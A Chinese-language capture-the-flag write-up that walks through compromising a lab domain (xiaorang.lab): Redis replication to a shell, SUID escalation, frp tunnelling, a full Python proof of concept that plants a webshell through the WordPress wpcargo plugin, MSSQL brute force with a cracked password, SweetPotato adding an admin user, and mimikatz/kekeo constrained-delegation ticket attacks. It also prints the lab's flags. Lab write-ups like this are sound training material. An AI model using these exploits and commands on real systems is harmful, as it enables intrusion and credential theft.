目录
①fcan扫外网,redis主从复制拿shell,suid提权
②wget下载frp,内网穿透,fscan扫内网
③wpscan扫wordpress RCE写webshell
④配置文件泄露,连数据库读敏感信息
⑤fscan爆破MSSQLSERVER密码,MDUT连接拿shell,提权
⑥约束委派攻击
①fcan扫外网,redis主从复制拿shell,suid提权
fscan扫出redis未授权访问
连一下客户端看版本号,5.0.12可以打主从复制
低权限shell,base64 suid提权
读到flag1
base64 '/home/redis/flag/flag01' | base64 --decode
flag{0087dfcd-13c0-4b8c-b9cd-d70cc588f8eb}
②wget下载frp,内网穿透,fscan扫内网
下载fscan扫内网
172.22.2.7 已控制
172.22.2.18 WordPress站点
172.22.2.3 DC
172.22.2.16 MSSQLSERVER
配好proxifier&proxychains4
③wpscan扫wordpress RCE写webshell
wpscan扫wordpress服务
扫出来wpcargo插件,存在一个公开poc
https://www.cnblogs.com/0x28/p/16562596.html
poc.py
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
def encode_character_code(c: int):
return '{:08b}'.format(c).replace('0', 'x')
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://172.22.2.18/'
cmd = 'ls'
# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
配好socks5代理后连蚁剑
④配置文件泄露,连数据库读敏感信息
wp-config.php中泄露了数据库连接信息
蚁剑连数据库
读到flag2
flag{c757e423-eb44-459c-9c63-7625009910d8}
还有个密码表dump下来,是连mssql的密码字典
⑤fscan爆破MSSQLSERVER密码,MDUT连接拿shell,提权
爆破出mssql的密码
fscan -h 172.22.2.16 -m mssql -pwdf password.txt -userf user.txt
[+] mssql:172.22.2.16:1433:sa ElGNkOiC连接
激活组件后RCE
靶机不出网,打msf正向连接
getsystem提权
下载文件
读到flag3
flag{a773bbc6-d907-4154-8610-c02bc8730d5d}
也可以甜土豆提权
⑥约束委派攻击
创建用户
C:/Users/Public/sweetpotato.exe -a "net user hacker qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators hacker /add"连一下RDP
然后打约束委派攻击
浅谈约束委派攻击 - 先知社区
先准备好所需工具
查看约束委派
AdFind.exe -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
管理员权限运行mimikatz 导出MSSQLSERVER的票据
privilege::debug
sekurlsa::tickets /export
exit
再用kekeo申请服务票据
tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:Administrator@XIAORANG.LAB /service:cifs/DC.XIAORANG.LAB
exit
mimikatz打ptt
mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit"
读到flag4
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
flag{7747a301-58ca-4d38-91d6-82e3717e25c2}
